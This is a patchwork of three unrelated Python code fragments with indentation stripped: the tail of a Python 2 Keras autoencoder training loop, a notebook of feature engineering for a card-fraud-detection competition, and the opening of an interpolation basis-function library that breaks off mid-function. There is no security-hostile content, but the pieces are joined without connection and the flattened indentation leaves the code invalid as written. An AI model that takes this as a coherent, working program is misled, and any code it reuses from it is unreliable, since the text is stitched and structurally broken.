print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='d')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='e')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='f')
print x.name, x.get_shape()
x = Conv2DTranspose(512,1,1,(None,64,64,512),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [128, 128, 512], stage=8, strides=(1,1), block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=8, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=8, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=8, block='d')
print x.name, x.get_shape()
x = Conv2DTranspose(256,1,1,(None,128,128,256),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [64, 64, 256], stage=9, block='a', strides=(1, 1))
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=9, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=9, block='c')
print x.name, x.get_shape()
x = Conv2DTranspose(128,1,1,(None,256,256,128),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [32, 32, 128], stage=10, block='a', strides=(1, 1))
print x.name, x.get_shape()
x = identity_block(x, 3, [32, 32, 128], stage=10, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [32, 32, 128], stage=10, block='c')
print x.name, x.get_shape()
x = Conv2DTranspose(64,1,1,(None,512,512,64),subsample=(2,2))(x)
print x.name, x.get_shape()
x = ZeroPadding2D((3, 3))(x)
print x.name, x.get_shape()
x = Convolution2D(64, 7, 7, subsample=(1, 1), name='conv3')(x)
print x.name, x.get_shape()
x = ZeroPadding2D((3, 3))(x)
print x.name, x.get_shape()
x = Convolution2D(3, 7, 7, subsample=(1, 1), name='conv4')(x)
print x.name, x.get_shape()
x = ZeroPadding2D((3, 3))(x)
print x.name, x.get_shape()
x = Convolution2D(1, 7, 7, subsample=(1, 1), name='conv5')(x)
print x.name, x.get_shape()
#x = Activation('softmax')(x)
#print x.name, x.get_shape()
decoded = x
autoencoder = Model(input_img, decoded,)
autoencoder.compile(
#optimizer='adadelta',
optimizer=RMSprop(lr=0.0003),
#optimizer=SGD(lr=0.1, decay=1e-6, momentum=1.9),
#loss='mse',
#loss='binary_crossentropy',
loss=pixel_weighted_loss,
#metrics=[mse_evbyev,mse_evbyev1,mse_evbyev2,mse_evbyev3,mse_evbyev4]
metrics=[mse_evbyev_w]
)
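# (added note) The block above builds a ResNet-50-style encoder (conv1 plus
# stages 2-5 of conv/identity blocks) that compresses a 512x512x1 crop into a
# 2*32*32 dense bottleneck, then mirrors it with Conv2DTranspose upsampling
# and further conv/identity blocks (stages 6-10) back to a 512x512x1 output,
# compiled with RMSprop and the pixel-weighted MSE defined earlier.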
def _parse_function(filename):
X=np.load(filename)['plane2'].reshape((1,))[0]
z00 = X.astype(np.float32).toarray().reshape((3456,1008,1));
while True:
i = np.random.randint(3456-base_wh)
j = np.random.randint(1008-base_wh)
z0 = z00[i:i+base_wh,j:j+base_wh,:]
if z0.max() > 0. or z0.min() < 0.: break
#print 'z0 shape:', z0.shape
z = z0
if z.max() > z.min(): z = (z0-np.min(z0))/(np.max(z0)-np.min(z0))
#zwh,edg = np.histogram(z0,bins=[0,1,13])
maxneg=-0.5
minpos=0.5
#print z0.min(),z0.max(),z0[z0<0.].shape,z0[z0>0.].shape
if z0.min()<0.: maxneg = np.max(z0[z0<0.])
if z0.max()>0.: minpos = np.min(z0[z0>0.])
zwh,edg = np.histogram(z0,bins=[-5000,maxneg/2,minpos/2,5000])
zwh=zwh.sum().astype(np.float32)/(zwh+1e-10)
zw = np.piecewise(z0,[(z0>=edg[i]-0.5)&(z0<edg[i+1]-0.5) for i in xrange(len(edg)-1)],zwh)
sumw = np.sum(zw) / zw.shape[0] / zw.shape[1]
return z, np.dstack([z,zw/sumw])
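# (added note) _parse_function loads a sparse 3456x1008 plane image from an
# .npz file, picks a random non-empty base_wh x base_wh crop, min-max
# normalises it to [0, 1], and builds a per-pixel weight map from a 3-bin
# histogram (negative / near-zero / positive raw values) so that rarer pixel
# classes receive larger weights. It returns (input, target-with-weights)
# with shapes (base_wh, base_wh, 1) and (base_wh, base_wh, 2).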
def randint(filename):
X=np.load(filename)['plane2'].reshape((1,))[0]
z00 = X.astype(np.float32).toarray().reshape((3456,1008,1));
i = np.random.randint(3456-base_wh)
j = np.random.randint(1008-base_wh)
while True:
z0 = z00[i:i+base_wh,j:j+base_wh,:]
if z0.max() > 0. or z0.min() < 0.: break
i = np.random.randint(3456-base_wh)
j = np.random.randint(1008-base_wh)
return (i, j)
def _parse_function_v(arg):
filename,(i,j) = arg
X=np.load(filename)['plane2'].reshape((1,))[0]
z0 = X.astype(np.float32).toarray().reshape((3456,1008,1));
z0 = z0[i:i+base_wh,j:j+base_wh,:]
z = z0
if z.max() > z.min(): z = (z0-np.min(z0))/(np.max(z0)-np.min(z0))
#zwh,edg = np.histogram(z0,bins=[0,1,13])
maxneg=-0.5
minpos=0.5
if z0.min()<0.: maxneg = np.max(z0[z0<0.])
if z0.max()>0.: minpos = np.min(z0[z0>0.])
zwh,edg = np.histogram(z0,bins=[-5000,maxneg/2,minpos/2,5000])
zwh=zwh.sum().astype(np.float32)/(zwh+1e-10)
zw = np.piecewise(z0,[(z0>=edg[i]-0.5)&(z0<edg[i+1]-0.5) for i in xrange(len(edg)-1)],zwh)
sumw = np.sum(zw) / zw.shape[0] / zw.shape[1]
return z, np.dstack([z,zw/sumw])
if False:
#z = (z0+4096.)/4096./2.
z = (z0-np.min(z0))/(np.max(z0)-np.min(z0))
zz = skimage.measure.block_reduce(z,(6,2),np.max)
zz2 = skimage.measure.block_reduce(z,(6,2),np.min)
zzm = skimage.measure.block_reduce(z,(6,2),np.mean)
zzw = skimage.measure.block_reduce(z0,(6,2),np.count_nonzero)
zzwh,edg = np.histogram(zzw,bins=[0,1,5,13])
zzwh = zzwh.sum().astype(np.float32)/(zzwh+1e-10)
#zzwh[0] = zzwh[0]/100.
zzw = zzw.astype(np.float32)
zzw = np.piecewise(zzw,[(zzw>=edg[i]-0.5)&(zzw<edg[i+1]-0.5) for i in xrange(len(edg)-1)],zzwh)
#zzw = v_reweight(x=zzw,hist=zzwh,bins=edg)
sumw = np.sum(zzw) / zzw.shape[0] / zzw.shape[1]
zzw = zzw / sumw
zz3 = np.dstack([zz,zz2,zzm])
zz4 = np.dstack([zz,zz2,zzm,zzw])
#return zz3,zz4
# A vector of filenames.
import os
filenames = ['output7/%s'%f for f in os.listdir('output7') if f.endswith('.npz') ]
valid_filenames = ['outputV/%s'%f for f in os.listdir('outputV') if f.endswith('.npz') ]
valid_starts = [randint(f) for f in valid_filenames]
np.random.shuffle(filenames)
epochs=350
steps_per_epoch=25
batch_size=4
valid_batch_size=4
valid_steps=640/valid_batch_size
min_mean_valid_loss = float('inf')
alllosses=[]
try:
for epoch in xrange(epochs):
for step in xrange(steps_per_epoch):
startev = (epoch * steps_per_epoch + step * batch_size) % len(filenames)
stopev = (epoch * steps_per_epoch + (step+1) * batch_size) % len(filenames)
if(startev > stopev):
a = filenames[startev:]
np.random.shuffle(filenames)
dataset=map(_parse_function,filenames[:stopev]+a)
else:
dataset=map(_parse_function,filenames[startev:stopev])
x,y = zip(*dataset)
loss = autoencoder.train_on_batch(np.stack(x),np.stack(y))
#print loss
#print loss[1].shape
#print loss[2].shape
#print loss[3].shape
#print loss[4].shape
#print loss[5].shape
#print len(y)
#print len(dataset)
#print np.stack(y).shape
#raise Exception
#print epoch, step, loss
mean_valid_loss = 0.;
alllosses=[]
for step in xrange(valid_steps):
startev = (step * valid_batch_size) % len(valid_filenames)
stopev = ((step+1) * valid_batch_size) % len(valid_filenames)
if(startev > stopev):
dataset=map(_parse_function_v,zip(valid_filenames[:stopev]+valid_filenames[startev:],valid_starts[:stopev]+valid_starts[startev:]))
else:
dataset=map(_parse_function_v,zip(valid_filenames[startev:stopev],valid_starts[startev:stopev]))
x,y = zip(*dataset)
losses=autoencoder.test_on_batch(np.stack(x),np.stack(y))
mean_valid_loss+=losses[0]
alllosses+=[losses[1]]
print epoch,'VALID',mean_valid_loss/valid_steps#,alllosses
if mean_valid_loss < min_mean_valid_loss:
min_mean_valid_loss = mean_valid_loss
autoencoder.save('autoencoder.min.mdl')
np.save('alllosses.min.npy',np.concatenate(alllosses))
except KeyboardInterrupt:
pass
finally:
autoencoder.save('autoencoder.mdl')
if len(alllosses) >0: np.save('alllosses.npy',np.concatenate(alllosses))
#print dataset
#print dataset
#autoencoder.fit(x,y,epochs=50,steps_per_epoch=25,validation_data = (xv,yv),validation_steps=10)
if False:
input_img = Input(shape=(576, 504, 3)) # adapt this if using `channels_first` image data format
x = Conv2D(16, (3, 3), activation='relu', padding='same')(input_img)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
encoded = MaxPooling2D((2, 2), padding='same')(x)
#encoded = MaxPooling2D((2, 2), padding='same')(x)
#print encoded.shape
# at this point the representation is (4, 4, 8) i.e. 128-dimensional
x = Conv2D(8, (3, 3), activation='relu', padding='same')(encoded)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, (3, 3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(16, (3, 3), activation='relu', padding='same')(x)
# coding: utf-8
# In[853]:
# for C4, C6, C7, C8, C10 outliers, look at the categorical variables to see if we can identify groupings...
#C8,c10 we can kinda tell, 0.51
# C12=0.553
# Hard winsorize:
traintr.loc[traintr.D4>484,'D4'] = 485
testtr.loc[testtr.D4>484,'D4'] = 485
data.loc[data.D4>484,'D4'] = np.nan
test_cvs(data, 'D4')
traintr['look'] = traintr.C1 + traintr.C2 + traintr.C11
testtr['look'] = testtr.C1 + testtr.C2 + testtr.C11
START_DATE = '2017-12-01'
startdate = datetime.datetime.strptime(START_DATE, '%Y-%m-%d')
traintr['tdt'] = traintr['TransactionDT'].apply(lambda x: (startdate + datetime.timedelta(seconds = x)))
traintr['tmonth'] = traintr.tdt.dt.month
import pandas as pd
import numpy as np
from time import time
import datetime
import lightgbm as lgb
import gc, warnings
gc.collect()
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import precision_score, recall_score, confusion_matrix, accuracy_score
from sklearn.metrics import roc_auc_score, f1_score, roc_curve, auc,precision_recall_curve
from scipy import interp
import matplotlib.pyplot as plt
import seaborn as sns
from tqdm import tqdm
# In[278]:
id_30_dates = {
# https://en.wikipedia.org/wiki/Android_version_history
'Android 4.4.2':'2012-11-13',
'Android 5.0':'2014-11-12',
'Android 5.0.2':'2014-12-19',
'Android 5.1.1':'2015-04-21',
'Android 6.0':'2015-10-05',
'Android 6.0.1':'2015-12-07',
'Android 7.0':'2016-08-22',
'Android 7.1.1':'2016-12-05',
'Android 7.1.2':'2017-04-04',
'Android 8.0.0':'2017-08-21',
'Android 8.1.0':'2017-12-05',
'Android 9':'2018-08-06',
'Windows XP':'2001-10-25',
'Windows Vista':'2006-11-08',
'Windows 7':'2009-10-22',
'Windows 8':'2012-10-26',
'Windows 8.1':'2013-10-17',
'Windows 10':'2015-07-29',
# https://robservatory.com/a-useless-analysis-of-os-x-release-dates/
'Mac OS X 10.6': '2009-08-28',
'Mac OS X 10_6_8': '2011-06-23',
'Mac OS X 10_7_5': '2012-09-19',
'Mac OS X 10_8_5': '2013-09-12',
'Mac OS X 10.9': '2013-10-22',
'Mac OS X 10_9_5': '2014-09-17',
'Mac OS X 10.10': '2014-10-16',
'Mac OS X 10_10_5': '2015-08-13',
'Mac OS X 10.11': '2015-09-30',
'Mac OS X 10_11_3': '2016-01-19',
'Mac OS X 10_11_4': '2016-03-20',
'Mac OS X 10_11_5': '2016-05-16',
'Mac OS X 10_11_6': '2016-07-18',
'Mac OS X 10.12': '2016-09-20',
'Mac OS X 10_12': '2016-09-20',
'Mac OS X 10_12_1': '2016-10-24',
'Mac OS X 10_12_2': '2016-12-13',
'Mac OS X 10_12_3': '2017-01-23',
'Mac OS X 10_12_4': '2017-03-27',
'Mac OS X 10_12_5': '2017-05-15',
'Mac OS X 10_12_6': '2017-07-19',
'Mac OS X 10.13': '2017-09-25',
'Mac OS X 10_13_1': '2017-10-31',
'Mac OS X 10_13_2': '2017-12-06',
'Mac OS X 10_13_3': '2018-01-23',
'Mac OS X 10_13_4': '2018-03-29',
'Mac OS X 10_13_5': '2018-06-01',
'Mac OS X 10_13_6': '2018-07-09',
'Mac OS X 10.14': '2018-09-24',
'Mac OS X 10_14': '2018-09-24',
'Mac OS X 10_14_0': '2018-09-24',
'Mac OS X 10_14_1': '2018-10-30',
'Mac OS X 10_14_2': '2018-12-05',
'iOS 9.3.5':'2016-08-25',
'iOS 10.0.2':'2016-09-23',
'iOS 10.1.1':'2016-10-31',
'iOS 10.2.0':'2016-12-12',
'iOS 10.2.1':'2017-01-23',
'iOS 10.3.1':'2017-04-03',
'iOS 10.3.2':'2017-05-15',
'iOS 10.3.3':'2017-07-19',
'iOS 11.0.0':'2017-08-19',
'iOS 11.0.1':'2017-08-26',
'iOS 11.0.2':'2017-10-03',
'iOS 11.0.3':'2017-10-11',
'iOS 11.1.0':'2017-10-31',
'iOS 11.1.1':'2017-11-08',
'iOS 11.1.2':'2017-11-16',
'iOS 11.2.0':'2017-12-02',
'iOS 11.2.1':'2017-12-13',
'iOS 11.2.2':'2018-01-08',
'iOS 11.2.5':'2018-01-23',
'iOS 11.2.6':'2018-02-19',
'iOS 11.3.0':'2018-03-29',
'iOS 11.3.1':'2018-04-24',
'iOS 11.4.0':'2018-05-29',
'iOS 11.4.1':'2018-07-09',
'iOS 12.0.0':'2018-08-17',
'iOS 12.0.1':'2018-09-08',
'iOS 12.1.0':'2018-09-30',
'iOS 12.1.1':'2018-12-05',
'iOS 12.1.2':'2018-12-20',
}
id_30_dates = {k.lower():v for k,v in id_30_dates.items()}
# # Various FE
# In[2]:
def build_ranges(ranges):
out = []
for arange in ranges:
out.append(np.arange(arange[0], arange[-1]+1, 1).tolist())
return sum(out, [])
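# (added example) build_ranges([[1, 3], [7, 8]]) -> [1, 2, 3, 7, 8]:
# each [lo, hi] pair is expanded inclusively and the pieces are concatenated.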
def target_mean_encode(data, col):
encode = data.groupby(col).isFraud.mean().sort_values(ascending=False).reset_index()
mapper = {k:v for v, k in enumerate(encode[col].values)}
data[col] = data[col].map(mapper)
return data, mapper
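# (added example, hypothetical toy data) target_mean_encode ranks the
# categories of `col` by observed fraud rate, highest first, and replaces
# each category with its rank:
#   toy = pd.DataFrame({'cat': ['a', 'a', 'b'], 'isFraud': [1, 0, 0]})
#   toy, mapper = target_mean_encode(toy, 'cat')  # mapper == {'a': 0, 'b': 1}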
tt = time()
def updateme(msg, reset=False):
global tt
if reset: tt = time()
print(time()-tt, msg)
tt = time()
# In[287]:
def build_features(trx,idn):
updateme('Merging DataFrames + Computing NaNs')
trx['nulls_trx'] = trx.isna().sum(axis=1)
idn['nulls_idn'] = idn.isna().sum(axis=1)
data = trx.merge(idn, how='left', on='TransactionID')
old_features = [c for c in data.columns if c not in ['nulls_trx', 'nulls_idn']]
# Make sure everything is lowercase
for c1, c2 in data.dtypes.reset_index().values:
if not c2=='O': continue
data[c1] = data[c1].astype(str).apply(str.lower)
updateme('Building Groups')
stringy = lambda x: x.astype(str) + ' '
data['CardID'] = stringy(data.card1) + stringy(data.card2) + stringy(data.card3) + stringy(data.card4) + stringy(data.card5) + stringy(data.card6) + stringy(data.addr1) # + stringy(data.addr2) # Sergey says addr1 only: https://www.kaggle.com/c/ieee-fraud-detection/discussion/101785#latest-588573
data['DeviceID'] = stringy(data.DeviceType) + stringy(data.DeviceInfo) + stringy(data.id_31) # TODO: Clean
data['PAccountID'] = stringy(data.addr1) + stringy(data.addr2) + stringy(data.P_emaildomain)
data['RAccountID'] = stringy(data.addr1) + stringy(data.addr2) + stringy(data.R_emaildomain)
updateme('Count Encoding Groups')
# TODO: Try count + label encode (e.g. both)
for col in ['nulls_idn', 'nulls_trx', 'CardID', 'DeviceID', 'PAccountID', 'RAccountID', 'ProductCD']:
data[col] = data[col].map(data[col].value_counts(dropna=False))
updateme('Count Encoding Vars')
count_encode = ['card1', 'id_34', 'id_36', 'TransactionAmt']
for col in count_encode:
data['CountEncode_' + col] = data[col].map(data[col].value_counts(dropna=False))
updateme('Email Features')
data['TransactionAmtCents'] = np.ceil(data.TransactionAmt) - np.floor(data.TransactionAmt)
country_map = {
'com':'us', 'net':'us', 'edu':'us', 'gmail':'us',
'mx': 'mx', 'es':'es', 'de':'de', 'fr':'fr',
'uk':'uk', 'jp':'jp'
}
domain = lambda x: x.split('.')[0]
pemail_country = lambda x: x.split('.')[-1]
data['pemail_domain'] = data.P_emaildomain.astype(str).apply(domain)
data['pemail_ext'] = data.P_emaildomain.astype(str).apply(pemail_country).map(country_map)
data['remail_domain'] = data.R_emaildomain.astype(str).apply(domain)
data['remail_ext'] = data.R_emaildomain.astype(str).apply(pemail_country).map(country_map)
data['p_and_r_email'] = data.P_emaildomain.astype(str) + ' ' + data.R_emaildomain.astype(str)
updateme('Time Features')
# We can calculate transaction hour directly;
# but samples where D9 is NaN seem to have a lower fraud rate, and there are a LOT of them:
data.D9 = data.D9.isnull()
# Time deltas Mod7 and mod(7*4)
for i in range(1,16):
if i in [8,9]: continue
temp = data['D'+str(i)] % 7
temp.loc[data['D'+str(i)]==0] = -1
data['D{}_mod7'.format(i)] = temp.values
slope = 1 / (60*60*24) # sec/day
for i in range(1,16):
if i in [9]: continue
feature = 'D' + str(i)
data[feature+'_mfix'] = np.round_(data[feature] - (data.TransactionDT - data.TransactionDT.min()) * slope)
data[feature+'_mfix_mod7'] = data[feature+'_mfix'] % 7
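# (added note) The raw D columns appear to grow together with TransactionDT,
# i.e. they behave like "days since some past event" measured at transaction
# time. Subtracting the elapsed days (slope converts TransactionDT seconds to
# days) turns them into an estimate of that fixed reference date, which is
# much more stable per card/account; the _mod7 variants keep only the
# day-of-week component.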
START_DATE = '2017-12-01'
startdate = datetime.datetime.strptime(START_DATE, '%Y-%m-%d')
data['tdt'] = data['TransactionDT'].apply(lambda x: (startdate + datetime.timedelta(seconds = x)))
data['tdow'] = data.tdt.dt.dayofweek
data['thour'] = data.tdt.dt.hour
data['tdate'] = data.tdt.dt.date
# TODO: Add holidays.
# @9h, id_01 is the least
# @18h, id_02 is the least
data['thour_id_01'] = ((np.abs(9 - data.thour) % 12) + 1) * (data.id_01 + 1)
data['thour_id_02'] = ((np.abs(18 - data.thour) % 12) + 1) * (data.id_02 + 1)
# Groups:
updateme('Group Aggregates')
# I'm also trying features like HourTransactionVolume, DayTransactionVolume, etc, but they are not very promising. They tend to increase cv, but decreases lb. I hope this inspires you.
# temp = data.groupby(['thour','tdate']).size().reset_index()
# temp.rename(columns={0:'trans_per_hourdate'}, inplace=True)
# data = data.merge(temp, how='left', on=['thour','tdate'])
temp = data.groupby('thour').size().reset_index()
temp.rename(columns={0:'trans_per_hour'}, inplace=True)
data = data.merge(temp, how='left', on='thour')
cat = 'CardID'
grp = data.groupby(cat)
temp = grp.id_02.agg(['min','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'id_02', col) for col in ['min','std']]
data = data.merge(temp, how='left', on=cat)
temp = grp.C13.agg(['std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'C13', col) for col in ['std']]
data = data.merge(temp, how='left', on=cat)
temp = grp.TransactionAmt.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
temp = grp.D1_mfix.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'D1_mfix', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
cat = 'PAccountID'
grp = data.groupby(cat)
temp = grp.dist1.agg(['max', 'std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'dist1', col) for col in ['max', 'std']]
data = data.merge(temp, how='left', on=cat)
cat = 'nulls_trx'
grp = data.groupby(cat)
temp = grp.id_02.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'id_02', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
temp = grp.C13.agg(['max'])
temp.columns = ['G{}_{}_{}'.format(cat, 'C13', col) for col in ['max']]
data = data.merge(temp, how='left', on=cat)
cat = 'thour'
temp = data.groupby(cat).TransactionAmt.agg(['min','max','mean','median','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['min','max','mean','median','std']]
data = data.merge(temp, how='left', on=cat)
cat = 'addr1'
temp = data.groupby(cat).TransactionAmt.agg(['min','max','mean','median','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['min','max','mean','median','std']]
data = data.merge(temp, how='left', on=cat)
cat = 'card5'
temp = data.groupby(cat).TransactionAmt.agg(['min','max','mean','median','std'])
temp.columns = ['G{}_{}_{}'.format(cat, 'TransactionAmt', col) for col in ['min','max','mean','median','std']]
data = data.merge(temp, how='left', on=cat)
# End Groups
# IDEA here is (proven garbage with M5 and D1):
# Access from outside your country. (IP and browser language settings, time zone) (M? x D? interactions)
#data['M5_D1_mfix'] = (data.M5.map({'F':2, 'T':1, np.nan:0})+1).astype(np.float) * (data.D1_mfix-data.D1_mfix.min()+1).astype(np.float)
updateme('OHEs...')
# These just have fun isFraud means
OHEFeatures = {
'P_emaildomain': 'protonmail.com',
'R_emaildomain': 'protonmail.com',
'card2': 176,
#'addr2': 65,
#'V283': 17,
#'V37': 8,
#'V45': 4,
}
for key, val in OHEFeatures.items(): data['OHE_'+key] = data[key]==val
# During labeling the categorical values, protonmail.com tends to come up in others. Instead use this as another label. This gained me +0.120.
# addr1, addr2 <-- something in there. Also look at dist1 with these
# dist1 is probably dist from last transaction location
# These guys have the SAME value_count distribution per key as well!
# V126-V137 looks interesting. maybe a dollar amount or a distance
# V160-V166 similar to above
# V202-V206 similar
# V207-V216 similar
# V263-V278 similar
# V306-V321 similar
# V331-V339 similar
cols = ['V' + str(col) for col in build_ranges([
[126,137],
[160,166],
[202,216],
[263,278],
[306,321],
[331,339],
])]
#traintr['VSUM1'] = traintr.V130+traintr.V133+traintr.V136
#data['dollar_weirdness'] = data[cols].apply(lambda x: np.unique(x).shape[0], axis=1)
#data['weirdness'] = data[continuous].apply(lambda x: np.unique(x).shape[0], axis=1)
# V167-V168, V170 has similar distro
# V153-V158
# # Mean value of
import numpy
import numpy.linalg
def weights(basis, X, deriv=None):
"""
Calculates the interpolant value or derivative weights for points X.
:param basis: interpolation function in each direction, eg,
``['L1', 'L1']`` for bilinear.
:type basis: list of strings
:param X: locations to calculate interpolant weights
:type X: list or numpy array (npoints, ndims)
:param deriv: derivative in each dimension, e.g., ``deriv=[1, 1]``
:type deriv: list of integers
:return: basis weights (ndims)
:rtype: numpy array, size: (npoints, nweights)
>>> import numpy
>>> x = numpy.array([[0.13, 0.23], [0.77, 0.06]])
>>> weights(['L1', 'L2'], x, deriv=[0, 1])
array([[-1.8096, -0.2704, 1.8792, 0.2808, -0.0696, -0.0104],
[-0.6348, -2.1252, 0.8096, 2.7104, -0.1748, -0.5852]])
"""
basis_functions, dimensions = _get_basis_functions(basis, deriv)
X = _process_x(X, dimensions)
W = []
for bf in basis_functions:
if bf[0].__name__[0] == 'T':
W.append(bf[0](X[:, bf[1]]))
else:
W.append(bf[0](X[:, bf[1]])[0])
BPInd = _get_basis_product_indices(basis, dimensions, W)
if BPInd is None:
return W[0]
WW = numpy.zeros((X.shape[0], len(BPInd)))
if dimensions == 3:
for ind, ii in enumerate(BPInd):
WW[:, ind] = W[0][:, ii[0]] * W[1][:, ii[1]] * W[2][:, ii[2]]
else:
for ind, ii in enumerate(BPInd):
WW[:, ind] = W[0][:, ii[0]] * W[1][:, ii[1]]
return WW
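# (added example) For a single 1-D linear basis no tensor product is needed
# and the raw L1 weights are returned unchanged:
#   >>> weights(['L1'], [[0.25]])
#   array([[0.75, 0.25]])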
def _get_basis_product_indices(basis, dimensions, W):
"""
Returns the indices used to form the tensor product of the weights of the
individual basis functions.
"""
BPInd = None
if dimensions == 1:
return None
elif dimensions == 2:
if basis[0][0] == 'T':
return None
elif len(basis) == 2:
if (basis[0][0] == 'L' and basis[1][0] == 'L') or \
(basis[0][0] == 'L' and basis[1][0] == 'H') or \
(basis[0][0] == 'H' and basis[1][0] == 'L'):
BPInd = []
for ind1 in range(W[1].shape[1]):
for ind0 in range(W[0].shape[1]):
BPInd.append([ind0, ind1])
elif basis == ['H3', 'H3']:
BPInd = [[0, 0], [1, 0], [0, 1], [1, 1],
[2, 0], [3, 0], [2, 1], [3, 1],
[0, 2], [1, 2], [0, 3], [1, 3],
[2, 2], [3, 2], [2, 3], [3, 3]]
else:
raise ValueError('Basis combination not supported')
elif dimensions == 3:
if len(basis) == 3:
if (basis[0][0] == 'L' and basis[1][0] == 'L' and basis[2][0] == 'L'):
BPInd = []
for ind2 in range(W[2].shape[1]):
for ind1 in range(W[1].shape[1]):
for ind0 in range(W[0].shape[1]):
BPInd.append([ind0, ind1, ind2])
elif basis == ['H3', 'H3', 'H3']:
BPInd = [
[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0],
[0, 0, 1], [1, 0, 1], [0, 1, 1], [1, 1, 1],
[2, 0, 0], [3, 0, 0], [2, 1, 0], [3, 1, 0],
[2, 0, 1], [3, 0, 1], [2, 1, 1], [3, 1, 1],
[0, 2, 0], [1, 2, 0], [0, 3, 0], [1, 3, 0],
[0, 2, 1], [1, 2, 1], [0, 3, 1], [1, 3, 1],
[2, 2, 0], [3, 2, 0], [2, 3, 0], [3, 3, 0],
[2, 2, 1], [3, 2, 1], [2, 3, 1], [3, 3, 1],
[0, 0, 2], [1, 0, 2], [0, 1, 2], [1, 1, 2],
[0, 0, 3], [1, 0, 3], [0, 1, 3], [1, 1, 3],
[2, 0, 2], [3, 0, 2], [2, 1, 2], [3, 1, 2],
[2, 0, 3], [3, 0, 3], [2, 1, 3], [3, 1, 3],
[0, 2, 2], [1, 2, 2], [0, 3, 2], [1, 3, 2],
[0, 2, 3], [1, 2, 3], [0, 3, 3], [1, 3, 3],
[2, 2, 2], [3, 2, 2], [2, 3, 2], [3, 3, 2],
[2, 2, 3], [3, 2, 3], [2, 3, 3], [3, 3, 3]]
else:
raise ValueError('Basis combination not supported')
else:
raise ValueError('Basis combination not supported')
else:
raise ValueError('%d dimensions not supported' % (len(basis)))
return BPInd
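# (added example) For basis ['L1', 'L1'] each W[i] has two columns, so the
# product indices come out as [[0, 0], [1, 0], [0, 1], [1, 1]] -- the usual
# bilinear ordering N1(x)N1(y), N2(x)N1(y), N1(x)N2(y), N2(x)N2(y).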
def _get_basis_functions(basis, deriv):
"""
Returns a list of interpolation functions for the interpolation
definition and derivatives specified by the user. Also returns the
number of dimensions as defined in the basis parameter.
"""
# List of basis functions
bsfn_list = {
'L1': [L1, L1d1, L1d1d1],
'L2': [L2, L2d1],
'L3': [L3, L3d1],
'L4': [L4, L4d1],
'H3': [H3, H3d1, H3d1d1],
'T11': [T11],
'T22': [T22],
'T33': [T33, T33d1, T33d2],
'T44': [T44, T44d1, T44d2]}
# Set the index of the basis function in BFn from the deriv input
di = []
if deriv is None:
for bs in basis:
di.append(0)
else:
ind = 0
for bs in basis:
if bs[0] == 'T':
if deriv[ind:ind+2] == [0, 0]:
di.append(0)
elif deriv[ind:ind+2] == [1, 0]:
di.append(1)
elif deriv[ind:ind+2] == [0, 1]:
di.append(2)
else:
raise ValueError(
'Derivative (%d) for %s basis not implemented' %
(ind, bs))
ind += 2
else:
di.append(deriv[ind])
ind += 1
# Set the basis functions pointers and index in X for each basis in
# the basis input
dimensions = 0
basis_functions = []
for ind, bs in enumerate(basis):
if bs[0] == 'T':
if bs in bsfn_list.keys():
basis_functions.append([bsfn_list[bs][di[ind]],
[dimensions, dimensions + 1]])
dimensions += 2
else:
if bs in bsfn_list.keys():
basis_functions.append([bsfn_list[bs][di[ind]],
[dimensions]])
dimensions += 1
return basis_functions, dimensions
def _process_x(X, dimensions):
"""
Converts the X parameter to the correct numpy array for the
interpolation functions. The return numpy array should be size
(npoints, ndims).
"""
# Converting X to a numpy array if the input is a list
if isinstance(X, list):
if isinstance(X[0], list):
X = numpy.array([x for x in X])
else:
if dimensions == 1:
X = numpy.array([[x for x in X]]).T
else:
X = numpy.array([x for x in X])
if X.shape[1] != dimensions:
raise ValueError(
'X dimensions does not match the number of basis')
return X
# Lagrange basis functions
def L1(x):
"""
Linear lagrange basis function.
:param x: points to interpolate
:type x: numpy array (npoints)
:return: basis weights
:rtype: numpy array (npoints, 2)
"""
return numpy.array([1. - x, x]).T
def L1d1(x):
"""
